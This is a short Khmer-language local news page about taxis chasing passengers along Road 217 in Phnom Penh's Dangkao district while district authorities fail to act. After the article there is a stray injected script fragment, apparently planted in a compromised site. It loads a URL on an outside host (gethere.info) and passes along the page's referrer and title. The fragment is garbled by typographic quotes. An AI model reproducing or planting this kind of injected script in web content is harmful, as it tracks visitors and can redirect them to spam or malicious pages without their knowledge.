ព្រឹតិ្តការណ៍ថ្មីៗ

រថយន្ដឡាក់ស៊ីនៅតែបន្ដរត់ដេញចាប់ម៉ូយប្រផាត់ប្រផីងតាមបណ្ដោយ ផ្លូវ២១៧ តែអាជ្ញាធរខណ្ឌដង្កោហាក់បីមិនអើពើទៅបញ្ហានេះ

3 ឆ្នាំ មុន 1 តូ សុផល

រាជធានីភ្នំពេញ៖ ជារៀងរាល់ថ្ងៃរថយន្ដឡាក់ស៊ីរត់ដេញចាប់ម៉ូយប្រផាត់ប្រផីងតាមបណ្ដោយ ផ្លូវ២១៧ តែអាជ្ញាធរខណ្ឌដង្កោហាក់បីដូចជាមិនអើពើទៅបញ្ហានេះបន្ដិណាសោះឡើយ។ ប្រជាពលរដ្ឋដែលបានធ្វើដំណើរតាមណ្ដោយផ្លូវ ២១៧ បន្ទាប់ពីឆ្លងស្ពានដែកចូលទឹកដីខណ្ឌដង្កោមានរអ៊ូររទាំមយ៉ាងខ្លាំងទៅលើបញ្ហាអ្នករត់តាក់ស៊ីដែលរត់ចាប់ម៉ូយតាមបណ្ដោយផ្លូវមួយខ្សែនេះ ព្រោះមើលទៅហាក់បីដូចជាគ្រោះថ្នាក់ខ្លាំងសំរាប់បងប្អូនដែលកំពុងធ្វើដំណើរនៅលើដងផ្លូវ ម្យ៉ាងវិញទៀតវាហាក់បីដូចជាគ្មានសណ្ដាប់ធ្នាប់បន្ដិចណាឡើយ។

ប្រភពដដែលបានបន្ដទៀតថាកន្លងមកគេក៍បានធ្លាប់ឃើញសន្ដិសុខខណ្ឌដង្កោដេញរថយន្ដទាំងនោះមិនអោយចាប់ម៉ូយនៅតាមដងផ្លូវនេះទេ តែមិនបានប៉ុន្មានថ្ងៃផងស្រាប់តែដដែល នេះហាក់បីដូចចំណាត់ការតែមួយចំអិនកំពឹសអញ្ចឹង។
បើតាមសម្ដីរបស់លោក ម៉ុក ពុទ្ធា នាយករដ្ឋបាលខណ្ឌដង្កោបានអោយដឹងថាកាលពីអភិបាលខណ្ឌចាស់លោកនៅលោកបានអនុញ្ញាត្តិអោយម្ចាស់តាក់ស៊ីទាំងនោះរកស៊ីតាមដងផ្លូវនេះ តែរហូតមកដល់ពេលនេះលោក នុត ពុធដារ៉ា អភិបាលខណ្ឌថ្មីមិនបានអនុញ្ញាត្ដិអោយម្ចាស់តាក់ស៊ីទាំងនោះធ្វើការរកស៊ីនៅតាមផ្លូវនេះទៀតទេ តែទោះជាយ៉ាងណាម្ចាស់រថយន្ដទាំងនោះនូវតែបំពានហាក់បីដូចជាមិនក្លាចញញើតអាជ្ងាធរណាបន្ដិចណាសោះ។ អាត ចន្ធូ

image image image image image images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ